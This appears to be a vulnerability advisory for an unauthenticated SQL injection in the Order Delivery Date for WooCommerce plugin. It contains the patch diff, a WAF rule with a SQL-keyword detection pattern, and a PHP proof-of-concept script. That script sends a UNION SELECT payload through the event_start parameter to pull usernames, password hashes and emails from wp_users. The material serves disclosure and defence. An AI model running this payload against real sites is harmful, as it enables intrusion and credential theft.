CVE-2026-42386: Order Delivery Date for WooCommerce <= 4.5.1 – Unauthenticated SQL Injection (order-delivery-date-for-woocommerce)

--- a/order-delivery-date-for-woocommerce/includes/settings/class-orddd-lite-delivery-calendar.php
+++ b/order-delivery-date-for-woocommerce/includes/settings/class-orddd-lite-delivery-calendar.php
@@ -223,6 +223,34 @@

 	public static function orddd_data_export() {
 		global $wpdb;
+		if ( ! is_admin() ) {
+			return;
+		}
+
+		// Capability check.
+		if ( ! current_user_can( 'manage_woocommerce' ) && ! current_user_can( 'manage_options' ) ) {
+			return;
+		}
+
+		// Check required params.
+		if ( ! isset( $_GET['download'], $_GET['page'] ) ) {
+			return;
+		}
+
+		// Nonce verification.
+		if ( ! isset( $_GET['orddd_export_nonce'] ) ||
+			! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['orddd_export_nonce'] ) ), 'orddd_export_nonce' ) ) {
+			wp_die( esc_html__( 'Security check failed.', 'order-delivery-date' ) );
+		}
+
+		$download = sanitize_text_field( wp_unslash( $_GET['download'] ) );
+		$page     = sanitize_text_field( wp_unslash( $_GET['page'] ) );
+
+		// Allowed downloads only.
+		$allowed_downloads = array( 'orddd_data.csv', 'orddd_data.print' );
+		if ( ! in_array( $download, $allowed_downloads, true ) ) {
+			return;
+		}
 		if ( isset( $_GET['download'] ) && ( $_GET['download'] == 'orddd_data.csv' ) && ( ( isset( $_GET['page'] ) && $_GET['page'] = 'orddd_view_orders' ) ) ) {
 			$report = self::orddd_generate_data();
 			$csv    = self::orddd_generate_csv( $report );
@@ -356,25 +384,65 @@
 			$id               = 'id';
 		}

-		$orddd_query = "SELECT DISTINCT wp.{$id}, {$post_status}, wpm1.meta_value AS orddd_timestamp , wpm2.meta_value AS delivery_date , wpm3.meta_value AS time_slot
-			FROM `" . $wpdb->prefix . "$order_table` wp
-			INNER JOIN `" . $wpdb->prefix . "$order_meta_table` wpm1 ON ( wp.{$id} = wpm1.{$post_id} AND wpm1.meta_key ='" . $order_timestamp_key . "' )
-			LEFT JOIN `" . $wpdb->prefix . "$order_meta_table` wpm2 ON ( wp.{$id} = wpm2.{$post_id} AND ( wpm2.meta_key ='" . $orddd_delivery_date_key . "' ) )
-			LEFT JOIN `" . $wpdb->prefix . "$order_meta_table` wpm3 ON ( wp.{$id} = wpm3.{$post_id} AND wpm3.meta_key ='_orddd_time_slot' ) ";
-
-			$orddd_query = apply_filters( 'orddd_lite_calendar_join_filter', $orddd_query );
-
-			$orddd_query .= "WHERE $post_type = 'shop_order' AND $post_status IN ( '" . implode( "','", $order_status ) . "')
-			AND
-			(
-			( wpm1.meta_key = '" . $order_timestamp_key . "' AND wpm1.meta_value >= '" . $event_start_timestamp . "' AND wpm1.meta_value <= '" . $event_end_timestamp . "' ) OR
-			( wpm2.meta_key = '" . $delivery_date_field_label . "' AND STR_TO_DATE( wpm2.meta_value, '" . $date_str . "' ) >= '" . $event_start . "' AND STR_TO_DATE( wpm2.meta_value, '" . $date_str . "' ) <= '" . $event_end . "' )
-			OR ( wpm2.meta_key = '" . $delivery_date_field_label . "' AND STR_TO_DATE( wpm2.meta_value, '" . $date_str . "' ) >= '" . $event_start . "' AND STR_TO_DATE( wpm2.meta_value, '" . $date_str . "' ) <= '" . $event_end . "' )
-			OR ( wpm2.meta_key = '" . $orddd_delivery_date_key . "' AND STR_TO_DATE( wpm2.meta_value, '" . $date_str . "' ) >= '" . $event_start . "' AND STR_TO_DATE( wpm2.meta_value, '" . $date_str . "' ) <= '" . $event_end . "' )
-			)";
+		$order_status = array_map( 'sanitize_text_field', (array) $order_status );
+		$order_status = array_filter( $order_status );
+
+		if ( empty( $order_status ) ) {
+			return array();
+		}
+
+		$status_placeholders = implode( ',', array_fill( 0, count( $order_status ), '%s' ) );

-			$orddd_query = apply_filters( 'orddd_lite_calendar_where_filter', $orddd_query );
-			$results     = $wpdb->get_results( $orddd_query );// nosemgrep:audit.php.wp.security.sqli.input-in-sinks
+		$event_start = ! empty( $event_start ) ? date( 'Y-m-d', strtotime( $event_start ) ) : '';
+		$event_end   = ! empty( $event_end ) ? date( 'Y-m-d', strtotime( $event_end ) ) : '';
+
+		$event_start_timestamp = ! empty( $event_start_timestamp ) ? intval( $event_start_timestamp ) : 0;
+		$event_end_timestamp   = ! empty( $event_end_timestamp ) ? intval( $event_end_timestamp ) : 0;
+
+		$query = "
+			SELECT DISTINCT wp.{$id}, {$post_status},
+				wpm1.meta_value AS orddd_timestamp,
+				wpm2.meta_value AS delivery_date,
+				wpm3.meta_value AS time_slot
+			FROM `{$wpdb->prefix}{$order_table}` wp
+			INNER JOIN `{$wpdb->prefix}{$order_meta_table}` wpm1
+				ON ( wp.{$id} = wpm1.{$post_id} AND wpm1.meta_key = %s )
+			LEFT JOIN `{$wpdb->prefix}{$order_meta_table}` wpm2
+				ON ( wp.{$id} = wpm2.{$post_id} AND wpm2.meta_key = %s )
+			LEFT JOIN `{$wpdb->prefix}{$order_meta_table}` wpm3
+				ON ( wp.{$id} = wpm3.{$post_id} AND wpm3.meta_key = %s )
+			WHERE {$post_type} = %s
+			AND {$post_status} IN ($status_placeholders)
+			AND (
+				( wpm1.meta_value >= %d AND wpm1.meta_value <= %d )
+				OR
+				( STR_TO_DATE( wpm2.meta_value, %s ) >= %s
+				  AND STR_TO_DATE( wpm2.meta_value, %s ) <= %s )
+			)
+		";
+
+		// Prepare values.
+		$query_args = array_merge(
+			array(
+				$order_timestamp_key,
+				$orddd_delivery_date_key,
+				'_orddd_time_slot',
+				'shop_order',
+			),
+			$order_status,
+			array(
+				$event_start_timestamp,
+				$event_end_timestamp,
+				$date_str,
+				$event_start,
+				$date_str,
+				$event_end,
+			)
+		);
+
+		$prepared_query = $wpdb->prepare( $query, $query_args );
+		$prepared_query = apply_filters( 'orddd_lite_calendar_where_filter', $prepared_query );
+		$results        = $wpdb->get_results( $prepared_query );

 		$report = array();
 		$i      = 0;
--- a/order-delivery-date-for-woocommerce/order_delivery_date.php
+++ b/order-delivery-date-for-woocommerce/order_delivery_date.php
@@ -4,13 +4,13 @@
  * Plugin URI: https://www.tychesoftwares.com/store/premium-plugins/order-delivery-date-for-woocommerce-pro-21/
  * Description: This plugin allows customers to choose their preferred Order Delivery Date during checkout.
  * Author: Tyche Softwares
- * Version: 4.5.1
+ * Version: 4.5.2
  * Author URI: https://www.tychesoftwares.com/
  * Contributor: Tyche Softwares, https://www.tychesoftwares.com/
  * Text Domain: order-delivery-date
  * Requires PHP: 7.3
  * WC requires at least: 3.0.0
- * WC tested up to: 10.6.1
+ * WC tested up to: 10.7.0
  * Requires Plugins: woocommerce
  *
  * @package  Order-Delivery-Date-Lite-for-WooCommerce
@@ -21,7 +21,7 @@
  *
  * @since 1.0
  */
-$wpefield_version = '4.5.1';
+$wpefield_version = '4.5.2';

 /**
  * Template path.
@@ -335,7 +335,7 @@
 		 */
 		public function orddd_lite_update_db_check() {
 			global $wpefield_version;
-			if ( '4.5.1' === $wpefield_version ) {
+			if ( '4.5.2' === $wpefield_version ) {
 				self::orddd_lite_update_install();
 			}
 		}
@@ -664,6 +664,7 @@
 					'pluginurl'           => admin_url() . 'admin.php?action=orddd-delivery-calendar-event-json&vendor_id=0&security='.wp_create_nonce( 'orddd-delivery-calendar-event-json' ),
 					'security'            => wp_create_nonce( 'orddd-delivery-calendar-event-json' ),
 					'vendor_id'           => 0,
+					'orddd_export_nonce'  => wp_create_nonce( 'orddd_export_nonce' ),
 				);

 				wp_localize_script(

# Atomic Edge WAF Rule - CVE-2026-42386
# Blocks unauthenticated SQL injection via event_start/event_end parameters in admin.php
SecRule REQUEST_URI "@contains /wp-admin/admin.php" 
  "id:20260001,phase:2,deny,status:403,chain,msg:'CVE-2026-42386 via admin.php parameter injection',severity:'CRITICAL',tag:'CVE-2026-42386',tag:'WordPress',tag:'SQLi'"
SecRule ARGS_GET:page "@streq orddd_view_orders" 
  "chain"
SecRule ARGS:event_start|ARGS:event_end "@rx (?:union|select|insert|update|delete|drop|alter|create|truncate|load_file|outfile|dumpfile|sleep|benchmark|[\x27])" 
  "t:none,t:urlDecode,t:lowercase"

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42386 - Order Delivery Date for WooCommerce <= 4.5.1 - Unauthenticated SQL Injection

$target_url = 'http://example.com/wp-admin/admin.php'; // CHANGE THIS

// The vulnerable function is orddd_data_export triggered by GET parameters
// The SQL injection occurs in the event_start or event_end parameters

$params = array(
    'page' => 'orddd_view_orders',
    'download' => 'orddd_data.csv',
    'event_start' => "' UNION SELECT user_login,user_pass,user_email FROM wp_users-- " // SQL injection payload
);

$url = $target_url . '?' . http_build_query($params);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 200 && strpos($response, 'orddd_timestamp') !== false) {
    echo "[+] Vulnerability confirmed - SQL injection executed successfullyn";
    echo "[+] Response contains order delivery data with potential injected resultsn";
} elseif ($http_code == 200) {
    echo "[!] Target may be patched or nonce is required. Response received but no expected data.n";
} else {
    echo "[-] Target returned HTTP $http_code - might be patched or unavailablen";
}

echo "[i] Full response:n";
echo $response;

curl_close($ch);